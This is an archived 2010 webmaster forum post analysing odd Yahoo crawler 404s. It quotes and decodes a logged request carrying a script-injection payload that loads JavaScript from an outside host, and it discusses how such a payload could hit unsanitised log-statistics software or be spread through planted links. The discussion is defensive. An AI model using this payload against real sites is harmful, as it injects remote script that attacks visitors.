Webmaster World Forum http://www.webmasterworld.com

Page is a not externally linkable
- Yahoo
-- Yahoo Search Engine and Directory
---- Strange 404s from Yahoo Slurp

SteveWh - 1:15 am on Jun 23, 2010 (gmt 0)

Somewhat disorganized comments based on a longer second look...

"/question/index?qid=20100223114447AAUSrnf" is the URL format of a Yahoo Answers question, and, oddly enough, when plugged into the correct website address of YA, it is a real existing question.

Some "thinking out loud"...

"GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E"
decodes to
GET /<sc<script src=http://example.com/x.js></script>

example.com is, as you said, an old exploit site from last summer. That JS code was injected into server pages or databases using various injection techniques, but that code was the injected content. In itself, it's not capable of compromising the server. That was done some other way. Once the code is in the site, its job is to launch browser exploits against people who visit the site.

But the request you found in your log is misguided if it was intended as an attack on the server. The page request itself is for an HTML script tag. An attack on your *server* would have to use something like PHP (a server side language) or SQL, not JavaScript (client side).

Maybe this URL with the JS in it is an attack against you, via statistics software. If a stats program puts that text in a report of pages requested, but fails to properly sanitize HTML tags, then that script could launch the exploit against *you*, just from viewing the page containing the text, and it wouldn't matter what response code the server gave for the request. The point was to get the request into the access log, that's all.

dstiles's suggestion about what could cause a Yahoo bot to make such a request sounds like a strong possibility to me. What if somebody placed in a forum or blog comment somewhere a link to your site, but the link contains that JavaScript code as a cross-site scripting attack? It seems at least conceivable that a crawler might run across the link and innocently follow it.

Maybe try doing web searches to try to find pages with links to your site and also with references to that malicious domain.

Thread source:: http://www.webmasterworld.com/yahoo_search/4152420.htm
Brought to you by WebmasterWorld: http://www.webmasterworld.com